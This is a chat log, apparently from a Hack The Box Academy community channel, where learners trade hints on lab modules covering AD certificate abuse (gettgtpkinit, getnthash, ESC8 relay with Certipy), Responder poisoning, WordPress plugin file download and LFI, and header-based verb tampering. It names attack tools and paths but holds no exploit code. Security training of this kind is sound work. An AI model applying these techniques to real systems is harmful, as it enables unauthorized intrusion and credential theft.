Will downgrade if that doesn't work I guess
Yeah, those versions fixed it for me.
upgraded or downgraded?
hi, help me please
I'm having trouble doing the web proxy lab in the Repeated Requests section, I tried looking for another flag, but I still can't find it anywhere, when I see the hint is "It's not in the same directory!", I went outside the HTML folder to look for it, but I still can't find it
I have answer but while I am aligning them ( 3 names ) it's not accepting......
Please someone tell me the correct order, by reading this format I am not able to find the correct order to give my answer
Please help 🙏
👀
Any help?
Every time I try to spawn the machine for the FTP module, it says that there is already an instance and it doesn't let me proceed with the tasks, can anyone help me?
Hello
Anyone avail for a dm or assist?
Hey guys, I have a question. I'm currently doing the Footprinting module's easy lab and when I try to "get" the id_rsa, the ftp program seems to stuck. Does anyone have the same problem?
Been stuck at this for 10 mins straight
Scratch that, my Cloudflare WARP was on 💀
Module : Introduction To Splunk & SPL, first question. this gives me the name of 1 user but its apparently wrong, can someone push me into the right direction?
I am not sure what this script is doing, is it like going to execute what is inside the "cmd.text"?
The first line will have already executed the command which is in string.
The cmd.text is just the output of what's been executed
Ahhh makes sense now, thank you!
I'm a bit lost
Passing the Certificate
Got the NTLM hash from the admin account after using ||gettgtpkinit|| I'm just so confused on where to go from here... The module just kind of ended there and moved on to Shadow Credentials... Anyone got any nudges? please @ with responses
anyone for this?
The last few times I've had that happened, I've logged out and back in and it's worked ok for me
Do you know if anyone passed the CPTS exam after the update?
Yes they did
I tried it now but it keeps giving the same error
Hello everyone! I need someone to tell me I'm not crazy. I'm on the first question of the Hypertext Transfer Protocol, and I've downloaded the /download.php file (using "curl -O IP:PORT/download.php"), and used -i to display the file. So far so good, the filename of the downloaded file is apparently ||"flag.txt"||. I submit this. And I'm told it's wrong. Is hackthebox tripping or am I?!
Awesome. Thanks 🙂
Most of the time I find a flag this specific on HTB and still get an error on, it turns out to be an extra whitespace (before or after the HTB flag string) grabbed in the flag Copy/Paste.
I've tried both typing and pasting it, with and without quotation marks. The actual question was:
To get the flag, start the above exercise, then use cURL to download the file returned by '/download.php' in the server shown above.
I found the filename that I can't submit by first downloading the file, then using -i to display what was in download.php. Is it possible this wasn't what the question was after?
And the flag string it gave you is of this format: HTB{flag_string} ? If not, something else is missing, maybe a decoding? If it gave you the right file format then I'm not sure what's going on.
What update? There's an update?
Another way to exploit ESC8 is through https://github.com/ly4k/Certipy/wiki/06-‐-Privilege-Escalation#esc8-ntlm-relay-to-ad-cs-web-enrollment, also try the find to identify the vulnerability, you would need dnschef.
Back to your question, you can turn your ticket to NTLM hash through getnthash.
@grizzled schooner
i have a question about LLMNR and NBT-NS poisoning, it works on VPN? using Responder
Good evening, I'm about to launch the AD enumeration and attacks module as soon as I've finished the introduction to AD. For those of you who have done it, how long did it take to finish? According to HTB it's "7 days" which seems crazy 😮
need help on Credential Hunting in Network Shares
Hacking wordpress - skills assessment:
I have submitted all the questions but one, "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download." I got a bit confused about what file would contain the flag, so I went on with the other questions and skipped that one for last. Figured things would align once getting a shell. but. Even with a reverse shell on the box, I still don't understand which file I'm looking for. None of my 'find', 'grep' or poking around skills solves my problem. Would appreciate some kind of idea on what to search for. Thank you.
Question on AEN Module, unable to figure out where I am going wrong on the Verb tampering.
Look through the identified wpscan vulnerabilities. You'll have to read up on some of them to identify the right one or at least one that allows you to do what the question is asking you to find.
yeah, I found it and I can use it to read files on the server (doing it now), so found the mentioned LFI, but still no idea which file should contain the flag 🙃
Yeah there was last month
What is it about?
There might be more than one vulnerability that you can exploit. I would focus more on something that might say File Download
Ok, I will have to poke around, got a shell so I'll see what I can find, thanks
If you don't get anywhere, you can DM.
Ok, I think I misread the following question about lfi and grouped them together. (the download and the version for lfi plugin). I'll rethink and see what I can find. Thanks!
No one has the changelog for the exam aside from the exam creators. The premise is still the same. The path is enough for the exam
Thanks, I was just wondering I thought it was like a modules change or something about exam rules.
There's instructions in #welcome
nice, thank you
hello guys
Hello 🙋♂️
anyone able to help me finish off this
+ 1 Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.
but im unsure on where / how to find the file im looking for
Great thanks. I went back to the module and found another attack technique that allowed the ntlm hash to be relayed.
Not the correct CVE.
ill see my self out
I'm pretty sure I just gave some tips on this one. Scroll up or use the search feature.
@pliant yacht please don't spoil module content :))))))
Has anyone finished Reliable Threat? I've been at it for 3 days looking for one answer and about to give up, someone PM me plZ
This web proxies module is terrible…
Hey guys
Hey @zealous trench
Question on AEN Module, unable to figure out where I am going wrong on the Verb tampering. I am not getting the proper response after adding X-Custom-IP-Authorization:
saying just that is torture
the module itself is a guide you shouldn't really need anything else if you're really stuck on it
its the correct plugin?
I have followed the advised route, tried on both my VM and on Pwnbox but still not getting the different reply. Going to take some time and try again.
Send me a pm, I might have made a mistake.
@zealous trench so you just admitted to doing a crime :) congratulations